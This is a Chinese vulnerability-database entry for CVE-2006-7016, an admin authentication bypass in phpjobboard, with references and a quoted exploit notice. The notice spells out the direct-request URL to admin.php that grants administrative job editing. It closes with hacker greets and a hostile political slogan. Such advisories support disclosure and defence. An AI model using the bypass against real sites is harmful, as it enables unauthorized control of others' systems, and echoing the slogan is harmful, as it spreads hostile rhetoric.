phpjobboard 'admin.php' 权限提升漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1191691 漏洞类型 未知
发布时间 2007-02-14 更新时间 2007-02-14
CVE编号 CVE-2006-7016 CNNVD-ID CNNVD-200702-287
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/87041
https://cxsecurity.com/issue/WLB-2007020056
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-287
|漏洞详情
phpjobboard允许远程攻击者可以借助对具有adminop=job-edit的admin.php提交一个直接请求,绕过权限并获得管理员特权。
|漏洞EXP
SOFTWARE

==========

phpjobboard

DESCRIPTION:

============

job board administration bypass, and edit or add to new job.

example

http://[target]/phpjobboard or your path/admin.php?menu=job&adminop=job-edit&id=[item id]

============================================

greets iskorpitx(best),thehacker,metlak,shadow,tugra and all AYYILDIZ member.

#####damn with pkk terrorism, damn with terrorist people!

==========================================
|受影响的产品
Phpjobboard Phpjobboard 0
|参考资料

来源:XF
名称:phpjobboard-admin-auth-bypass(26807)
链接:http://xforce.iss.net/xforce/xfdb/26807
来源:BUGTRAQ
名称:20060525phpjobboardAuthecnicaladminbyPass
链接:http://www.securityfocus.com/archive/1/archive/1/435119/30/4710/threaded
来源:OSVDB
名称:26561
链接:http://www.osvdb.org/26561
来源:VIM
名称:20060617phpjobboardAuthecnicaladminbyPass(fwd)
链接:http://attrition.org/pipermail/vim/2006-June/000873.html
来源:SREASON
名称:2253
链接:http://securityreason.com/securityalert/2253